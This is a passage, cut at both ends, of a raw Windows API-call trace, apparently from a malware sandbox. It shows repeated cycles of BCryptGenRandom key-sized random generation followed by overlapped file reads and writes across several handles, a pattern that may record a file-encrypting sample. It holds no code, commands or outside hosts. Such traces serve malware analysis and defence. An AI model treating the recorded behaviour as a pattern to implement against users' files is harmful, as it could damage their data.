lpOverlapped=0x3df0008) returned 1 [0196.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.812] CloseHandle (hObject=0x330) returned 1 [0196.812] free (_Block=0x3df0008) [0196.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.820] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.820] free (_Block=0x3e305b8) [0196.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.821] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.821] free (_Block=0x1fa91d0) [0196.821] free (_Block=0x1fa2ed8) [0196.821] free (_Block=0x1fa90b8) [0196.821] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.821] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.831] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.831] CloseHandle (hObject=0x330) returned 1 [0196.831] free (_Block=0x3df0008) [0196.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.841] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.841] free (_Block=0x3e305b8) [0196.842] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.842] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.842] free (_Block=0x1fa91d0) [0196.842] free (_Block=0x1fa2ed8) [0196.842] free (_Block=0x1fa90b8) [0196.842] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.843] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.854] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2398, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.856] CloseHandle (hObject=0x330) returned 1 [0196.856] free (_Block=0x3df0008) [0196.856] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.864] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.865] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.865] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.865] free (_Block=0x3e305b8) [0196.865] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.865] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.865] free (_Block=0x1fa91d0) [0196.865] free (_Block=0x1fa2ed8) [0196.865] free (_Block=0x1fa90b8) [0196.865] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.866] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.866] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x11f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.876] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17f2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.877] CloseHandle (hObject=0x330) returned 1 [0196.877] free (_Block=0x3df0008) [0196.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.885] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.886] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.886] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.886] free (_Block=0x3e305b8) [0196.886] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.886] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.886] free (_Block=0x1fa91d0) [0196.886] free (_Block=0x1fa2ed8) [0196.886] free (_Block=0x1fa90b8) [0196.886] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.888] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.889] CloseHandle (hObject=0x330) returned 1 [0196.889] free (_Block=0x3df0008) [0196.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.901] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.901] free (_Block=0x3e305b8) [0196.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.901] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.902] free (_Block=0x1fa91d0) [0196.902] free (_Block=0x1fa2ed8) [0196.902] free (_Block=0x1fa90b8) [0196.902] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.903] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.914] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x248e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.916] CloseHandle (hObject=0x330) returned 1 [0196.916] free (_Block=0x3df0008) [0196.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.925] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.925] free (_Block=0x3e305b8) [0196.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.926] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.926] free (_Block=0x1fa91d0) [0196.926] free (_Block=0x1fa2ed8) [0196.926] free (_Block=0x1fa90b8) [0196.926] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.926] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.947] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2424, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.953] CloseHandle (hObject=0x330) returned 1 [0196.953] free (_Block=0x3df0008) [0196.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.954] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x68c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.966] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.967] CloseHandle (hObject=0x3cc) returned 1 [0196.967] free (_Block=0x3df0008) [0196.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.981] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3138, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.982] CloseHandle (hObject=0x3cc) returned 1 [0196.982] free (_Block=0x3df0008) [0196.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.992] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.992] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.992] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.992] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.992] free (_Block=0x3e305b8) [0196.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.992] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.993] free (_Block=0x1fa91d0) [0196.993] free (_Block=0x1fa2ed8) [0196.993] free (_Block=0x1fa90b8) [0196.993] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.995] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.008] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5d78, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.022] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2dc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.024] CloseHandle (hObject=0x3cc) returned 1 [0197.024] free (_Block=0x3df0008) [0197.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.034] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.034] free (_Block=0x3e305b8) [0197.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.034] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.034] free (_Block=0x1fa91d0) [0197.034] free (_Block=0x1fa2ed8) [0197.034] free (_Block=0x1fa90b8) [0197.034] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.036] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 